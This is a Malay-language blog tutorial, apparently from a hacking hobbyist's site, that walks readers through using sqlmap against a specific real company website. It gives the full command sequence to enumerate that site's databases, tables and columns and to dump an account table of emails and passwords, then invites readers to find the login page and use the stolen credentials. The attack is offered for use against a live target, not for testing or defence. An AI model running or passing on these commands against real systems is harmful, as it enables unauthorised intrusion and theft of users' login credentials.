Cara Menggunakan SQLMaps

Salam Sejahtera Semua .. ok . hari ni seth nak terangkan cara guna SQLmap . 100% Credit goes to Prince Kira dari Silent Hacker Crew

Ok jom start

Sblom tue, barang2 yang perlu korang ade

1-Python 2.7 (http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi)

2-Sqlmap (http://sqlmap.sourceforge.net/)

3-CMD (same jea dgn command prompt)

4-vuln website

ok mule2 pgy ke local disk c. Buat satu folder dan namakannya sqlmap

Sekarang extract file sqlmap yang kite da download tady ke dalam folder sqlmap

Ok set.

Sekarang buka cmd

untuk kali nie saye akan menggunakan vuln website berupa niehttp://www.mmbuildings.com/newsitem.php?id=61

Ok skarang di cmd buka dan type

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61

ok skarang kalau mengikut website yang saye pilih tady akan kluar due option iaitu Y/N

ok type N

skarang sqlmap akn shutdown

Type nie pula

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 --dbs

kalau anda ikut step by step anda sepatutnya akan dapat database

Database yang saye dapat berupa

*mm_mm

*information_schema <-------yang nie kite ta nak

Jadi kite akan pilih mm_mm <------comel la plak...hehe

Macamne kite na pilih??

Type nie c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm --tables

Tgu dy scan jap <-----boleh minum kopi ntuk mengelakkan rase bosan

Skarang kite akan nampak tables

Jadi skarang saye akan pilih tables account (ingat setiap website mempunyai tables yang berlainan)

Type dalam cmd

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --columns

Yes. Sekarang dah nampak 3 columns iaitu email id login access dan password! :D

Jadi saye akan ambil ke 3 3 nye (WOOHOO)

Type nie plak

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --dump

Wow! ade email n pass n id

Pastue nak buatpe?? Pk2 la sdry (cary la login page n Enjoy!)

Saye mgambil mase yang lame menulis tutor ini jadi kalau nak gne jgn lpe credit kpade saye !

Special Thank To My Partner Prince Kira SHC (silent hacker Crew)

By My Self . How to use SqlMap (video)

Jangan Jadi Orang Yang Ego . MiDle FinGer For YOu !

CREDIT

Cara Menggunakan SQLMaps

0 comments:

Labels

Blog Archive

Your IP Address

Translator

HOT FM

Ninja Saga Malaysia

Revolver Map

Flag Counters

Counters

Live Traffic Feed

Malaysian Hacker-Spirit of Hacking